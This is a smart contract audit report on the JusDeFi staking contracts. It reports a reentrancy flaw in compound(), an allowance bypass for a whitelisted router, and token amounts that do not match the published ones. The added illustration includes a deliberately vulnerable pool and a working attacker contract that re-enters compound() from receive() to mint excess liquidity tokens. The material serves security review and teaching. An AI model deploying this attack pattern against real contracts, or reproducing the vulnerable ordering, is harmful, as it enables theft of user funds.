JusDeFi smart contract security audit report performed by Callisto Security Audit Department
JusDeFi is a next-generation yield farming experiment, combining some of the most exciting features from today's biggest players in DeFi with revolutionary new tokenomics. Participants can stake JDFI tokens directly (or stake LP for even larger rewards), and our unique fee structure powers the burn and buyback systems which in turn drive price action. Whenever you unstake your JDFI, a fee will be charged. Half goes into the staking rewards pool, and the other half is burned. This unstaking fee is dynamic, and changes weekly based on community governance.
Commit hash d2dbfc8f0d2cff1f0ffca9153de509da59c79aec
Include:
- AirdropToken.sol
- DevStakingPool.sol
- FeePool.sol
- JDFIStakingPool.sol
- JusDeFi.sol
- StakingPool.sol
- UNIV2StakingPool.sol
- interfaces/IJDFIStakingPool.sol
- interfaces/IJusDeFi.sol
- interfaces/IStakingPool.sol
Exclude:
- test/JusDeFiMock.sol
- test/StakingPoolMock.sol
In total, 3 issues were reported, including:
- 1 high severity issue.
- 2 notes.
High severity issue: reentrancy in compound() of UNIV2StakingPool.sol
Description: In the function compound(), the remaining ETH is sent back to the caller (msg.sender.sendValue) before the caller's rewards are cleared with _clearRewards. sendValue is an external call, so a contract acting as msg.sender can re-enter compound() from its receive/fallback function while its reward balance is still non-zero, and use the same rewards many times to mint additional liquidity tokens.
Recommendation: Clear the caller's rewards before sending the remaining ETH back (effects before interactions), i.e. call _clearRewards(msg.sender) first, as below. See https://github.com/jusdefi/jusdefi/blob/d2dbfc8f0d2cff1f0ffca9153de509da59c79aec/contracts/UNIV2StakingPool.sol#L61-L64
_clearRewards(msg.sender);
// return remaining ETH to sender
msg.sender.sendValue(msg.value - amountETH);
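The following is an added illustration of the reported pattern and is not JusDeFi's code: a stripped-down pool whose compound() refunds surplus ETH before clearing rewards, the same pool with the recommended ordering (plus a mutex as defence in depth), and an attacker contract that re-enters from receive(). The contract names, the creditRewards() helper, the 1 wei per reward token pairing rule and the LP accounting are assumptions made only for this demo.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added illustration, not JusDeFi code. Names, the pairing ratio and the LP
// accounting below are assumptions made for the demo.
abstract contract PoolBase {
    mapping(address => uint256) public rewards;   // pending rewards per staker
    mapping(address => uint256) public lpBalance; // liquidity tokens minted by compound()

    // Hypothetical helper so the demo has rewards to spend (no access control on purpose).
    function creditRewards(address staker, uint256 amount) external {
        rewards[staker] += amount;
    }

    // Assumed pairing rule: `reward` tokens are paired with `reward` wei;
    // anything sent above that is surplus to be refunded.
    function _pair(uint256 reward) internal returns (uint256 amountETH) {
        require(reward > 0, "no rewards");
        amountETH = reward;
        require(msg.value >= amountETH, "insufficient ETH");
        lpBalance[msg.sender] += reward;
    }

    // Low-level equivalent of OpenZeppelin's Address.sendValue.
    function _refund(uint256 amount) internal {
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "refund failed");
    }

    function compound() external payable virtual;
}

// Reproduces the reported ordering: the refund (an external call) is made
// while rewards[msg.sender] is still non-zero.
contract VulnerablePool is PoolBase {
    function compound() external payable override {
        uint256 amountETH = _pair(rewards[msg.sender]);
        _refund(msg.value - amountETH); // a contract caller re-enters here
        rewards[msg.sender] = 0;        // cleared too late
    }
}

// Recommended ordering (clear rewards, then refund) plus a mutex as defence in depth.
contract FixedPool is PoolBase {
    bool private locked;

    modifier nonReentrant() {
        require(!locked, "reentrant");
        locked = true;
        _;
        locked = false;
    }

    function compound() external payable override nonReentrant {
        uint256 amountETH = _pair(rewards[msg.sender]);
        rewards[msg.sender] = 0;        // effect first
        _refund(msg.value - amountETH); // a re-entering call now fails on "no rewards"
    }
}

// Attacker: sends more ETH than the pairing needs so that a refund, and thus a
// callback into receive(), happens, then calls compound() again from there.
contract Attacker {
    PoolBase public pool;
    uint256 public depth;

    constructor(PoolBase _pool) {
        pool = _pool;
    }

    // Call with value = N * reward to mint about N times the LP the reward is worth.
    function attack() external payable {
        pool.compound{value: msg.value}();
    }

    receive() external payable {
        // Against VulnerablePool the rewards are still credited when this runs.
        if (depth < 3 && msg.value > 0) {
            depth++;
            pool.compound{value: msg.value}();
        }
    }
}
```

Walking through it under the stated assumptions: after creditRewards(attacker, 1 ether) on VulnerablePool, attacker.attack{value: 4 ether}() nests three re-entries (refunds of 3, 2 and 1 ether each trigger receive()) and leaves lpBalance[attacker] at 4 ether although only 1 ether of reward was ever credited. The same call against FixedPool reverts: the nested compound() hits the mutex, the refund's low-level call returns false, and the whole transaction is rolled back. An EOA caller has no receive hook and is unaffected by either version.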
Note: The function transferFrom in JusDeFi allows transfers from any address without an allowance when msg.sender is whitelisted. Two of the three whitelisted addresses are JDFIStakingPool and UNIV2StakingPool, which are part of the codebase, but the third address, uniswapRouter, is set in the constructor and is an external contract that is not part of the provided codebase. A whitelisted contract can move any holder's tokens, so you have to be sure that the uniswapRouter contract passed a security audit and has no issues, and that the address passed to the constructor at deployment is the intended one.
Note: The preset values of RESERVE_TEAM, RESERVE_JUSTICE and the preminted JDFI/A amount do not match the corresponding values published on https://www.jusde.fi/
The high severity issue that was found has to be fixed before deployment. You also have to pay attention to the two notes pointed out in this report.